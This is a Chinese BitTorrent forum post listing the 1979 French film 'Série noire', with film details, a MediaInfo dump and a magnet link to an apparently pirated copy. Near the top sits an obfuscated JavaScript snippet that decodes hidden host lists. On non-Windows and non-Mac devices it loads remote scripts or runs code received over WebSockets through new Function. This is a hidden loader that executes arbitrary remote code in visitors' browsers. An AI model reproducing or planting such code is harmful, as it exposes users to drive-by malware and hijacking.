Série[中文字幕].noire.1979.1080p.BluRay.x265.10bit.FLAC.2.0 7.49GB

版主小s 1月前 281

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 黑色小说
◎片  名 Série noire
◎年  代 1979
◎产  地 法国
◎类  别 剧情
◎语  言 法语
◎上映日期 1979-04-25
◎IMDb链接 https://www.imdb.com/title/tt0079980/
◎豆瓣评分 7.6/10 (671人评价)
◎豆瓣链接 https://movie.douban.com/subject/2979199/
◎片  长 111 分钟
◎导  演 阿兰·科诺 Alain Corneau (id:1025431)
◎编  剧 阿兰·科诺 Alain Corneau (id:1025431)
       乔治·佩雷克 Georges Perec (id:1033510)
       吉姆·汤普森 Jim Thompson (id:1150034)
◎演  员 帕特里克·迪瓦尔 Patrick Dewaere (id:1005236)
       玛丽·特兰蒂尼昂 Marie Trintignant (id:1007176)
       贝尔纳·布里埃 Bernard Blier (id:1066607)
       安德烈亚斯·卡楚拉斯 Andreas Katsulas (id:1114009)
       Jeanne Herviale Jeanne Herviale (id:1096322)
       米丽娅姆·博耶 Myriam Boyer (id:1068577)
       皮埃尔-威廉·格伦 Pierre-William Glenn (id:1276550)
       Thierry Derocles Thierry Derocles (id:1282268)

◎标  签 法国 / 法国电影 / 黑色 / 阿兰·柯诺 / 1970s / 1979 / AlainCorneau / 剧情

◎简  介
  Franck Poupart is a slightly neurotic door-to-door salesman in a sinister part of Paris' suburbs. He meets Mona, a teenager, who's been made a prostitute by her own aunt. Franck would like to change his life and also save Mona from her aunt. Murder is the only solution he finds to achieve his goal... A very gloomy movie, exuding dispair and uneasiness, with pathetic characters....

◎获奖情况 (共1项)
  第32届戛纳电影节 (1979)
  主竞赛单元 金棕榈奖(提名)
   └──阿兰·科诺 (id:1025431)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 309438560870437955903306970252100161876 (0xE8CBB2F3D110357ADABB1B2296A6D154)

  4. Complete name                            : Sé[email protected].mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.49 GiB

  8. Duration                                 : 1 h 56 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 9 227 kb/s

  11. Encoded date                             : UTC 2021-09-02 11:43:23

  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@Main

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 56 min

  21. Bit rate                                 : 8 029 kb/s

  22. Width                                    : 1 800 pixels

  23. Height                                   : 1 080 pixels

  24. Display aspect ratio                     : 5:3

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.172

  31. Stream size                              : 6.51 GiB (87%)

  32. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings                        : rc=crf / crf=20.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1800x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : FLAC

  39. Format/Info                              : Free Lossless Audio Codec

  40. Codec ID                                 : A_FLAC

  41. Duration                                 : 1 h 56 min

  42. Bit rate mode                            : Variable

  43. Bit rate                                 : 1 170 kb/s

  44. Channel(s)                               : 2 channels

  45. Channel layout                           : L R

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 11.719 FPS (4096 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossless

  50. Stream size                              : 971 MiB (13%)

  51. Writing library                          : libFLAC 1.2.1 (UTC 2007-09-17)

  52. Language                                 : French

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 52 min

  62. Bit rate                                 : 21.0 kb/s

  63. Count of elements                        : 2501

  64. Stream size                              : 16.8 MiB (0%)

  65. Title                                    : chs

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 52 min

  76. Bit rate                                 : 21.3 kb/s

  77. Count of elements                        : 2501

  78. Stream size                              : 17.1 MiB (0%)

  79. Title                                    : cht

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Text #3

  84. ID                                       : 5

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 1 h 53 min

  90. Bit rate                                 : 17.9 kb/s

  91. Count of elements                        : 2350

  92. Stream size                              : 14.6 MiB (0%)

  93. Title                                    : eng

  94. Language                                 : English

  95. Default                                  : No

  96. Forced                                   : No


  97. Menu

  98. 00:00:00.000                             : Chapter 01

  99. 00:11:29.605                             : Chapter 02

  100. 00:18:09.505                             : Chapter 03

  101. 00:30:28.326                             : Chapter 04

  102. 00:41:20.561                             : Chapter 05

  103. 00:48:48.008                             : Chapter 06

  104. 01:00:26.414                             : Chapter 07

  105. 01:11:37.001                             : Chapter 08

  106. 01:21:22.627                             : Chapter 09

  107. 01:27:41.756                             : Chapter 10

  108. 01:40:08.377                             : Chapter 11

  109. 01:53:52.659                             : Chapter 12

  110. 01:56:00.787                             : Chapter 13



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:F243A823352637A46C448E9212880B1539F192A0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回